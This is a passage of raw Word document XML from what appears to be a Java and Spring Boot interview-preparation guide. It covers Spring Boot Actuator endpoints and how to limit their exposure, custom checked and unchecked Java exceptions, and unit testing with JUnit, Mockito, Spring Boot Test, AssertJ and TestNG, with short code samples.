          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides health information about the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BDE94F"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http://localhost:8080/actuator/health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AC58C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metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes metrics about the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D5FB3E"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metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261461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info</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Exposes application information, such as build version, environment details, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE300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info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB4D73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env</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides information about environment properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1BAE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env</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5B891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pdump</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a heap dump of the application (useful for memory analysis).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A7A75A"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heapdump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CBF9A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threaddump</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a thread dump of the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2735E406"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threaddump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597977E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curing Actuator Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FA65F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include=health,info,metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7886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exclude=shutdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA8AE6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only the health, info, and metrics endpoints will be exposed, and the shutdown endpoint will be excluded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E37A7B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ecure the endpoints, you can configure authentication using Spring Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482A12D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name=admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11208E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password=adminpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290D7563"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045D0CD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604" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="692732FC" w14:textId="2A4E61EE" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="627" w:name="_Toc197867841"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are custom exceptions? How do you define your own custom exception</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="627"/>
    </w:p>
    <w:p w14:paraId="70D8EEEF" w14:textId="5D6D1FBA"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xceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Define a Custom Exception in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A945A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new class that extends Exception or RuntimeException</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785E2DC9"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 </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checked exception</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, extend the Exception class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500F739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n </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unchecked exception</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, extend the RuntimeException class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD1BC7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constructors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38384147"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ypically define constructors that allow you to pass a message or cause (stack trace) to the exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612D1A0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ly, override methods like toString() or getMessage()</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for customizing the exception output if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4C8B9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Checked Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0592C0F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InvalidUserInputException extends Exception {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A00CF2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3C17800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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C967DB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646240D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5DF363" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374EE5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 (another Throwable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D28B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Throwable cause) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C856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2A7DF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39B6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0F45D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Unchecked Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F689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NotFoundException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9F8F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02D0DF3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22111A4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0528E31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9CD209" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77324D3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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC99F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Throwable cause) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F823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E823B7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F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0DA6EA"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Custom Exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C934A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r custom exceptions are defined, you can throw and catch them like any other exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF5B5BF"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Throwing a Custom Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A3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6B4143A" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1578BDF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validateUser(String username) throws InvalidUserInputException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541CEF8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 username.isEmpty()) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E8B8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InvalidUserInputException("Username cannot be empty");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDB805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2D6D8A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434D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04BDE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Catching a Custom Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF5054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0ED94D64" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417AB6E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 = new UserService();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC72032" w14:textId="77777777" w:rsidR="00163EF6" w:rsidRPr="002C6305" w:rsidRDefault="00163EF6" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="412AF01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reateUser(String username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27485D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E412A4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validateUser(username);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FEA62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User created successfully!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783801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validUserInputException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A95D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rror: " + e.getMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20737FF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A013AA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C336E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225AC6"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 for Custom Exceptions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D011B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descriptive names</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Custom exceptions should have names that clearly describe the error condition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8C82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vide meaningful messages</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that the messages passed to the exception constructors explain the error in detail, which will be helpful for debugging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8540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hecked exceptions for recoverable conditions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For errors that the caller can potentially recover from, use checked exceptions (extend Exception).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E6E35"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unchecked exceptions for programming errors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For errors that are caused by bugs (like invalid argument passed to a method), use unchecked exceptions (extend RuntimeException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A6C6C9"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24FD9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605" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AB9521" w14:textId="6E0977D1" w:rsidR="009D6DE9" w:rsidRPr="00CE4B95" w:rsidRDefault="00433241">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="628" w:name="_Toc197867842"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Have you worked on Unit testing? Which framework have you used in your project</w:t>
      </w:r>
      <w:r w:rsidR="009D6DE9" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="628"/>
    </w:p>
    <w:p w14:paraId="1B4ADE8D" w14:textId="7EFDE207"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unit testing is a critical part of the development process. It helps ensure that individual components of the application work as expected and helps maintain code quality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22487D6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ava-based projects, the commonly used frameworks for unit testing include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FF890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JUnit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533966C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Unit 5</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is widely used in Java projects for unit testing. It provides annotations like @Test, @BeforeEach, @AfterEach, @BeforeAll, and @AfterAll to help with setting up and tearing down tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28BC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supports assertions like assertEquals(), assertTrue(), assertFalse(), etc., to validate the behavior of your code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E0F7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E7EAF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6D24B59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Add() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34563BB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Calculator calc = new Calculator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3EA7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calc.add(2, 3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0BA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5, result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A32AB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E8E47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ockito</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7591D3B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is a mocking framework used to create mock objects for unit testing. It is often used in conjunction with JUnit to mock dependencies and test the unit in isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767310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Mockito, you can mock objects, stub methods, and verify interactions with the mock objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373BD2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D07B4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ck</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB57B1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Service userService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FC64B" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35A71A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jectMocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A58A4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Controller userController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B64E2F" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27E248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2EF4DD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CreateUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F53D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createUser(any(User.class))).thenReturn(true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153ABFC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olean result = userController.createUser(new User());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DAEE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True(result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B458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77BF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pring Test / Spring Boot Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9D7A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 xml:space="preserve"> is commonly used in Spring applications for integration testing and verifying the interaction between components in a Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D319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ncludes tools like @SpringBootTest and @MockBean to mock Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E79C8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114CCA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35FBC5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UserControllerTest {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4F7D4" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03342D3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3B6C55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Controller userController;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BC41FE" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="723C730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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14157BE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173EBFCF" w14:textId="77777777" w:rsidR="00C6790E" w:rsidRPr="002C6305" w:rsidRDefault="00C6790E" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D5123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0CD8DF6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testGetUser() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770016C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getUser(1)).thenReturn(new User(1, "John Doe"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5977141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 user = userController.getUser(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484A35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NotNull(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E8FCD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John Doe", user.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423886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9AC66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BAD39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ssertJ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B52E2D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J</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a fluent assertion library that provides more readable and powerful assertions than JUnit alone. It works well with both JUnit and TestNG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D6819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13766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sertThat(result).isEqualTo(5).isGreaterThan(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7574C52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TestNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD2D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NG</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an alternative to JUnit with more advanced features, such as parallel test execution, dependencies, and groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4399DFE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has its own set of annotations like @Test, @BeforeMethod, and @AfterMethod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012FAC7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orkflow for Unit Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF700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Unit Tests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each unit test should focus on a small part of the application logic, typically one method at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD766B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 Dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use mocking frameworks like Mockito to isolate the unit under test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BF35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ions</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use assertions to check that the output of the method under test matches the expected values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480296E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ests</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run tests locally during development and via a continuous integration pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266447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factor</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After tests pass, refactor the code while ensuring all tests continue to pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702097A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nit Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67409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rly detection of bugs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unit tests help identify issues early in the development cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2556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mproves Code Quality</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Writing tests encourages developers to write more modular and maintainable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C3D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dence during Refactoring</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Unit tests provide a safety net when refactoring code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8547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nit testing frameworks like JUnit, Mockito, and Spring Boot Test ensure that your code works as expected and is reliable, reducing the chances of introducing errors into production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0E0FB9" w14:textId="15CB86B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606" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
